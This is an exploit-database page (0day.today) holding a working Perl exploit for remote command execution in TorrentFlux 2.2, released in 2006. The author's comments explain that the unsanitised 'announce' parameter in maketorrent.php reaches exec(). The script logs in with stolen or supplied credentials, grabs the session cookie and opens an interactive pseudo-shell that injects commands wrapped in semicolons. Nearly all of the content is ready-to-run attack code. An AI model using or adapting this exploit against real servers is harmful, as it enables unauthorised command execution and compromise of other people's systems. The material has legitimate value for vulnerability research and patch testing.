0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
TorrentFlux 2.2 (maketorrent.php) Remote Command Execution Exploit
[==================================================================
TorrentFlux 2.2 (maketorrent.php) Remote Command Execution Exploit
==================================================================
# The variable announce in maketorrent.php is not sanitised before being used. The announce
# variable goes through various stages throughout the script, then it is passed as a into
# an exec() function. This occurs in the middle of the string which is passed to the exec()
# function. Therefore it is possible to stop the current stop by starting with ; then by
# ending your command with ; (to avoid the other data TorrentFlux adds after the announce variable).
# No data is returned to the user when they use this exploit, so it is hard to tell if the script
# is vulnerable, and the use of htmlspecialchars() tends to make things much hard since
# chracters like < and > dont work.
# r0ut3r (writ3r [at] gmail.com)
#################################################################################################
# r0ut3r Presents... #
# #
# Another r0ut3r discovery! #
# writ3r [at] gmail.com #
# #
# TorrentFlux 2.2 Command Execution Exploit #
#################################################################################################
# Software: TorrentFlux 2.2 #
# #
# Vendor: http://www.torrentflux.com/ #
# #
# Released: 2006/12/09 #
# #
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) #
# #
# Note from a developer: "Valid TorrentFlux user IDs are REQUIRED and this is NOT an open #
# vulnerability to a NON user". #
# #
# Note: The information provided in this document is for TorrentFlux administrator #
# testing purposes only! This vulnerability requires a user account. And watch out #
# for htmlspecialchars() when sending commands since tf uses it to sanitise variables. #
# #
# Apart from a few problems (which are fixed) TorrentFlux is a great torrent client. #
# Download it at: http://www.torrentflux.com/ #
#################################################################################################
use IO::Socket;
$port = "80"; # connection port
$target = @ARGV[0]; # torrentflux.com
$folder = @ARGV[1]; # /torrentflux/
$user = @ARGV[2]; # login username
$pass = @ARGV[3]; # login password
sub Header()
{
print q
{#################################################################################################
# r0ut3r Presents... #
# #
# Another r0ut3r discovery! #
# writ3r [at] gmail.com #
# #
# TorrentFlux 2.2 Command Execution Exploit #
#################################################################################################
};
}
sub Usage()
{
print q
{
Usage: tf2exec.pl [target] [directory] [username] [password]
Example: tf2exec.pl torrentflux.com /torrentflux/ r0ut3r testing123
};
exit();
}
Header();
if (!$target || !$folder || !$user || !$pass) {
Usage(); }
#Thanks to cb88 for the login request...
print "\n[+] Connecting...\r\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print "[+] Attempting to login\n";
print $sock "GET ".$folder."login.php?username=$user&iamhim=$pass HTTP/1.1\n";
print $sock "Host: $target\n";
print $sock "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $sock "Accept: text/html\n";
print $sock "Connection: keep-alive\n\n\r\n";
while (<$sock>)
{
if (/Cookie: TorrentFlux=(.*?);/)
{
$cookie = "TorrentFlux=$1";
}
}
print "[+] Successfully logged in\n";
print "[+] Cookie: ".$cookie."\n";
if ($cookie eq "")
{
print "[-] Failed to login. Exiting...";
exit();
}
print "[+] Starting shell\n";
print "[cmd]\$ ";
$cmd = <STDIN>;
$cmd =~ s/ /%20/g;
while ($cmd !~ "exit")
{
$xpack = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...\r\n";
print $xpack "GET ".$folder."maketorrent.php?announce=;".substr($cmd, 0, -1)."; HTTP/1.1\n";
print $xpack "Host: $target\n";
print $xpack "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpack "Accept: text/html\n";
print $xpack "Cookie: ".$cookie."\n";
print $xpack "Connection: keep-alive\n\n";
print "[cmd]\$ ";
$cmd = <STDIN>;
}
print "[!] Connection to host lost...\n";
#################################################################################################
# 0day.today [2024-11-16] #